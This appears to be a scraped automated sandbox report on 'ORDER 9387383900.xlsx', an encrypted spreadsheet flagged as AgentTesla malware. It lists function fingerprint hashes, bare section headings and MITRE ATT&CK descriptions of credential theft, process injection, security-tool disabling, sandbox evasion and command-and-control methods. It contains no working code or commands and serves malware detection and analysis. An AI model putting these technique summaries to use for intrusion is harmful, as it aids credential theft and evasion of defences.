Opcode ID: 3e814c10e58bd3e75eb985f06a53fae92f07107d8e4338fbce8c273a758d6932
Instruction ID: eb8acfd95d531b0b29658abc3131a3fdb38e11e39413900d4b9fa386cfbb4b43
Opcode Fuzzy Hash: 3e814c10e58bd3e75eb985f06a53fae92f07107d8e4338fbce8c273a758d6932
Instruction Fuzzy Hash: 50115771A012489FCF06CFA8E490ADDBBB2FF8A316F214069D401AB261CB764D45CB51

Uniqueness

Uniqueness Score: -1.00%

Function 00352BF0, Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2345282711.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9969d89469bd75b15c81932c4f381f2bc57cebbe88ca41d0df792e78af5f1e67
Instruction ID: cda7713d149cbca63c357e0d3140e7ab3b4d43efb192e525cdb2d39ec8cddc53
Opcode Fuzzy Hash: 9969d89469bd75b15c81932c4f381f2bc57cebbe88ca41d0df792e78af5f1e67
Instruction Fuzzy Hash: 70018B71E012189FCF05DFA8E484ADDBBB6BF49315F100069E401BB390CB715D48CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 003593E8, Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2345282711.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 19e70753e5f5784cc775e5ec4c8893d21942ca6f4ede9f750e3ed2180d555170
Instruction ID: a75df558443d100910f73477c3a3cc4173f555fb78ad1aea9797dc6a07c69ed1
Opcode Fuzzy Hash: 19e70753e5f5784cc775e5ec4c8893d21942ca6f4ede9f750e3ed2180d555170
Instruction Fuzzy Hash: 6BF0A7B1F042199F8B40ABB998086AFBBF9DF88255F014476D90AD3745EF348E0187D1

Uniqueness

Uniqueness Score: -1.00%

Function 00350E0F, Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2345282711.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 90f39c9be02212e2f783074c903a565eb88ede98fb17727ea55bfbc21d0751c0
Instruction ID: c5a079f9c9a25414e6bbc448232f9a01c9f22f857a6094435ed47626978f4d83
Opcode Fuzzy Hash: 90f39c9be02212e2f783074c903a565eb88ede98fb17727ea55bfbc21d0751c0
Instruction Fuzzy Hash: 75E06D35B005588B8F40EBB9E8419DCB3F6BF88224B108425E509E7250DF349C028B91

Uniqueness

Uniqueness Score: -1.00%

Function 0035FA7F, Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2345282711.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8651a878d11076bd33c0234caac145b0033c1ef4cc69cd8825f326fc27f4168e
Instruction ID: 84f517a3d0dd19ea031bfd34af5caeca4313863f26d1c4231bed28ebbd7aec3a
Opcode Fuzzy Hash: 8651a878d11076bd33c0234caac145b0033c1ef4cc69cd8825f326fc27f4168e
Instruction Fuzzy Hash: 07E0ED35F001589B8F41EBB9D8459DDB3F6BF882257004466E509E7254EF349C52CB52

Uniqueness

Uniqueness Score: -1.00%

Function 00358A6F, Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2345282711.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b34ec3b02045b33aafd9d300f0569e2cbfa91f606eb7f5f3d52a8ddbc464f5db
Instruction ID: 47dc9b6428ce2576d3c3d1faf0a72b5592b1573b2d470b337ca8e35ede37a982
Opcode Fuzzy Hash: b34ec3b02045b33aafd9d300f0569e2cbfa91f606eb7f5f3d52a8ddbc464f5db
Instruction Fuzzy Hash: B9E0ED35B000598B8F41EBB9D8459DD73F6BF882697044465E509E7264EF349C128B51

Uniqueness

Uniqueness Score: -1.00%

Function 0035696F, Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2345282711.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0157b0ecb7a6c2aeb174f5fac62b061bd6d8114a1c446e3ad8c8faf2e6cd15d3
Instruction ID: 7cb00fa0338d5a8f663a31e24ab7dd6711815d46ddb4b48f24b646ecb1f4f504
Opcode Fuzzy Hash: 0157b0ecb7a6c2aeb174f5fac62b061bd6d8114a1c446e3ad8c8faf2e6cd15d3
Instruction Fuzzy Hash: 42E0ED35B001589B8F41EBB9D8459DDB3F6BF882297004465E509EB354DF349C52CB51

Uniqueness

Uniqueness Score: -1.00%

Function 0035894F, Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2345282711.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3f9fee8c37c36e09db9efea14d4c07673cb44b9b0635f748b6b0b72ad139e5ec
Instruction ID: ab84c90c0dfeff321e5f0196865712edbab6e7e6fef878087e0f056e84d9e32c
Opcode Fuzzy Hash: 3f9fee8c37c36e09db9efea14d4c07673cb44b9b0635f748b6b0b72ad139e5ec
Instruction Fuzzy Hash: 3AE0ED35B001588B8F41EBF9E8559EDB3F6BFC82257104065E509E7364DF349C52CB52

Uniqueness

Uniqueness Score: -1.00%

Function 0035FB9F, Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2345282711.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8f18e9ad8092a8f0d9d7e172ad4679134b724f6087cbb29eba7bb64d06ffd2d9
Instruction ID: 3a7761170b275df5746b895223cce1b8ff6723a3d5b61949fff26447d0f42646
Opcode Fuzzy Hash: 8f18e9ad8092a8f0d9d7e172ad4679134b724f6087cbb29eba7bb64d06ffd2d9
Instruction Fuzzy Hash: 28E0ED35F000598B8F41EBF9E8559DD73F6BF882297108065E509E7264DF349C12CB51

Uniqueness

Uniqueness Score: -1.00%

Function 00350BFF, Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2345282711.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e47f5f72fb95023e24c3e79369e6d145497532591243f5b028774007cd410711
Instruction ID: 6c5e4ba6d5dc22012fa1201ce51a266bb7561e6d5446a2f9e1745035f55170e0
Opcode Fuzzy Hash: e47f5f72fb95023e24c3e79369e6d145497532591243f5b028774007cd410711
Instruction Fuzzy Hash: F8E01235F001588B8F45EBF9D8559DDB3F6BF882257004065E50AEB365DF349C12C751

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Authentication logs, Email gateway, File monitoring, Mail server, Office 365 trace logs, Process monitoring, Process use of network
Platforms:	Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report ORDER 9387383900.xlsx

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Threatname: Agenttesla

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

System Summary:

Signature Overview

AV Detection:

Exploits:

Compliance:

Software Vulnerabilities:

Networking:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static OLE Info

General

OLE File "ORDER 9387383900.xlsx"

Indicators

Streams

Stream Path: \x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace, File Type: data, Stream Size: 64

General

Stream Path: \x6DataSpaces/DataSpaceMap, File Type: data, Stream Size: 112

General

Stream Path: \x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary, File Type: data, Stream Size: 200

General

Stream Path: \x6DataSpaces/Version, File Type: data, Stream Size: 76

General

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre